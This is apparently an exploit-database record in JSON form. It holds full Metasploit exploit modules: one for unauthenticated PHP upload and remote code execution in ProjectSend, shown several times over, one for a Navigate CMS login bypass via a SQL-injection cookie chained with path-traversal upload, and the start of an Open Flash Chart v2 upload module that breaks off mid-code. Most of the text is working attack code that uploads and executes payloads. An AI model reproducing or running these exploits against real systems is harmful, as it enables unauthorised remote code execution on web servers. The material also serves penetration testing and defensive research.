ID 1337DAY-ID-23041 Type zdt Reporter metasploit Modified 2014-12-30T00:00:00
Description
This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ProjectSend Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ProjectSend
revisions 100 to 561. The 'process-upload.php' file allows
unauthenticated users to upload PHP files resulting in remote
code execution as the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Fady Mohammed Osman', # Discovery and Exploit
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '35424']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
['ProjectSend (PHP Payload)', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 02 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
], self.class)
end
#
# Checks if target upload functionality is working
#
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'process-upload.php')
)
if !res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
elsif res.code.to_i == 404
vprint_error("#{peer} - No process-upload.php found")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 500
vprint_error("#{peer} - Unable to write file")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
vprint_error("#{peer} - File process-upload.php is not executable")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
vprint_error("#{peer} - Software is misconfigured")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
# response on revision 118 onwards includes the file name
if res.body && res.body =~ /NewFileName/
return Exploit::CheckCode::Vulnerable
# response on revisions 100 to 117 does not include the file name
elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
return Exploit::CheckCode::Appears
elsif res.body && res.body =~ /Failed to open output stream/
vprint_error("#{peer} - Upload folder is not writable")
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
#
# Upload PHP payload
#
def upload
fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
php = "<?php #{payload.encoded} ?>"
data = Rex::MIME::Message.new
data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
post_data = data.to_s
print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
if !res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
elsif res.code.to_i == 500
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
# response on revision 118 onwards includes the file name
elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
print_good("#{peer} - Payload uploaded successfully (#{fname})")
return fname
# response on revisions 100 to 117 does not include the file name
elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
print_warning("#{peer} - File upload may have failed")
return fname
else
vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}")
fail_with(Failure::Unknown, "#{peer} - Something went wrong")
end
end
#
# Execute uploaded file
#
def exec(upload_path)
print_status("#{peer} - Executing #{upload_path}...")
res = send_request_raw(
{ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
)
if !res
print_status("#{peer} - Request timed out while executing")
elsif res.code.to_i == 404
vprint_error("#{peer} - Not found: #{upload_path}")
elsif res.code.to_i == 200
vprint_good("#{peer} - Executed #{upload_path}")
else
print_error("#{peer} - Unexpected reply")
end
end
#
# upload && execute
#
def exploit
fname = upload
register_files_for_cleanup(fname)
exec("upload/files/#{fname}") # default for r-221 onwards
unless session_created?
exec("upload/temp/#{fname}") # default for r-100 to r-219
end
end
end
# 0day.today [2018-01-06] #
{"hash": "b45fbd00bc811684a8ceee99c726a0c35d9504338363c56b8b774404d66e097a", "id": "1337DAY-ID-23041", "lastseen": "2018-01-06T07:00:21", "viewCount": 16, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "1be4985a17c84e1f1e6be789bfeeb96f", "key": "href"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "9399f4c8f752b2882d1fc7d453c04008", "key": "sourceData"}, {"hash": "6e882c46fd45e6e50e548c3217287077", "key": "sourceHref"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-01-06T07:00:21"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-23043", "1337DAY-ID-18946", "1337DAY-ID-16622", "1337DAY-ID-16623", "1337DAY-ID-16503", "1337DAY-ID-13854"]}, {"type": "seebug", "idList": ["SSV:67248"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2010-0037.NASL", "REDHAT-RHSA-2010-0060.NASL", "REDHAT-RHSA-2010-0038.NASL", "SUSE_ACROREAD-6803.NASL", "SUSE_ACROREAD_JA-6805.NASL", "SUSE_ACROREAD-6802.NASL", "SUSE_ACROREAD_JA-6804.NASL", "SUSE_11_ACROREAD_JA-100128.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/BSPLAYER_M3U"]}, {"type": "exploitdb", "idList": ["EDB-ID:16623", "EDB-ID:16503"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10516"]}], "modified": "2018-01-06T07:00:21"}, "vulnersScore": 0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "title": "ProjectSend Arbitrary File Upload Exploit", "history": [{"bulletin": {"hash": "461131f39537a6010b5e10d2edc8c2c40867e3a6dd6915e97f933b7b079c5757", "id": "1337DAY-ID-23041", "lastseen": "2016-04-20T02:13:19", "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T02:13:19"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b889bd0cfbd114f81bae34f1b4b53b0d", "key": "sourceData"}, {"hash": "c318f49173c357c51baf9365199ac4b1", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d49ed7013c17e5e554f40e5a7735c0a3", "key": "href"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "viewCount": 3, "title": "ProjectSend Arbitrary File Upload Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "http://0day.today/exploit/description/23041"}, "lastseen": "2016-04-20T02:13:19", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "https://0day.today/exploit/description/23041"}
{"metasploit": [{"lastseen": "2019-12-12T23:12:29", "bulletinFamily": "exploit", "description": "This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. The module then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.\n", "modified": "2019-08-02T14:48:53", "published": "2018-09-26T19:39:15", "id": "MSF:EXPLOIT/MULTI/HTTP/NAVIGATE_CMS_RCE", "href": "", "type": "metasploit", "title": "Navigate CMS Unauthenticated Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Navigate CMS Unauthenticated Remote Code Execution',\n 'Description' => %q(\n This module exploits insufficient sanitization in the database::protect\n method, of Navigate CMS versions 2.8 and prior, to bypass authentication.\n\n The module then uses a path traversal vulnerability in navigate_upload.php\n that allows authenticated users to upload PHP files to arbitrary locations.\n Together these vulnerabilities allow an unauthenticated attacker to\n execute arbitrary PHP code remotely.\n\n This module was tested against Navigate CMS 2.8.\n ),\n 'Author' =>\n [\n 'Pyriphlegethon' # Discovery / msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-17552'], # Authentication bypass\n ['CVE', '2018-17553'] # File upload\n ],\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 26 2018'))\n\n register_options [\n OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']),\n ]\n\n self.needs_cleanup = true\n end\n\n def login_bypass\n check_resp = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/login.php')\n )\n\n login_bypass_resp = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/login.php'),\n 'cookie' => 'navigate-user=\\\" OR TRUE--%20'\n )\n\n if login_bypass_resp &&\n login_bypass_resp.code == 302 &&\n check_resp.body.include?('Navigate CMS')\n session_id = login_bypass_resp.get_cookies_parsed\n .values.select { |v| v.to_s.include?('NVSID_') }\n .first.first\n return session_id\n end\n end\n\n def check\n return CheckCode::Vulnerable if login_bypass\n CheckCode::Safe\n end\n\n def exploit\n session_id = login_bypass\n fail_with(Failure::NoAccess, 'Login bypass failed') unless session_id\n\n print_good('Login bypass successful')\n\n php = payload.encoded\n data = Rex::MIME::Message.new\n data.add_part(php, 'image/jpeg', nil,\n \"form-data; name=\\\"file\\\"; filename=\\\"#{rand_text_alphanumeric(10..15)}\\\"\")\n data_post = data.to_s\n\n upload = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),\n 'vars_get' => Hash[{\n 'session_id' => session_id,\n 'engine' => 'picnik',\n 'id' => '../../../navigate_info.php'\n }.to_a.shuffle],\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data_post\n )\n\n fail_with(Failure::Unreachable, 'Unable to reach target') unless upload\n fail_with(Failure::Unknown, 'Upload unsuccessful') unless upload.code == 200\n\n print_good('Upload successful')\n\n print_status('Triggering payload...')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/navigate_info.php')\n )\n end\n\n def on_new_session(session)\n super\n if session.type != 'meterpreter'\n print_error('Unable to restore navigate_info.php')\n return\n end\n\n session.core.use('stdapi') if !session.ext.aliases.include?('stdapi')\n\n begin\n session.fs.file.open('navigate_info.php', 'w').write(\"<?php\\n\\nphpinfo();\\n\\n?>\")\n rescue\n print_error('Unable to restore navigate_info.php')\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/navigate_cms_rce.rb"}, {"lastseen": "2019-11-29T09:40:17", "bulletinFamily": "exploit", "description": "This module exploits a file upload vulnerability found in Open Flash Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file in order to upload and execute malicious PHP files.\n", "modified": "2019-01-10T19:19:14", "published": "2013-10-24T12:16:41", "id": "MSF:EXPLOIT/UNIX/WEBAPP/OPEN_FLASH_CHART_UPLOAD_EXEC", "href": "", "type": "metasploit", "title": "Open Flash Chart v2 Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Open Flash Chart v2 Arbitrary File Upload\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Open Flash\n Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file\n in order to upload and execute malicious PHP files.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Braeden Thomas', # Initial discovery + Piwik PoC\n 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # OpenEMR PoC\n 'Halim Cruzito', # zonPHP PoC\n 'bcoles' # Metasploit\n ],\n 'References' =>\n [\n ['BID', '37314'],\n ['CVE', '2009-4140'],\n ['OSVDB', '59051'],\n ['EDB', '10532'],\n ['WPVDB', '6787'],\n ['WPVDB', '6788'],\n ['WPVDB', '6789'],\n ['WPVDB', '6790'],\n ['WPVDB', '6791'],\n ['WPVDB', '6792']\n ],\n 'Payload' =>\n {\n 'Space' => 8190, # Just a big value, injection on HTTP POST\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\"\n },\n 'Arch' => ARCH_PHP,\n 'Platform' => 'php',\n 'Targets' =>\n [\n # Tested on:\n # * open-flash-chart v2-Lug-Wyrm-Charmer\n # set TARGETURI /php-ofc-library/\n # * open-flash-chart v2-beta-1\n # set TARGETURI /php-ofc-library/\n # * zonPHP v2.25\n # set TARGETURI /zonPHPv225/ofc/\n # * Piwik v0.4.3\n # set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/\n # * OpenEMR v4.1.1\n # set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/\n [ 'Generic (PHP Payload)', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Dec 14 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to Open Flash Chart', '/php-ofc-library/'])\n ])\n end\n\n #\n # Check for ofc_upload_image.php\n #\n def check\n print_status(\"Sending check\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"ofc_upload_image.php\"),\n })\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n elsif res.code.to_i == 404\n vprint_error(\"No ofc_upload_image.php found\")\n elsif res and res.code == 200 and res.body =~ /Saving your image to/\n vprint_status(\"Found ofc_upload_image.php\")\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n # Upload\n @fname = \"#{rand_text_alphanumeric(rand(10)+6)}.php\"\n print_status(\"Uploading '#{@fname}' (#{payload.encoded.length} bytes)...\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'),\n 'ctype' => \"\",\n 'vars_get' => { 'name' => \"#{@fname}\" },\n 'data' => \"<?php #{payload.encoded} ?>\"\n })\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif 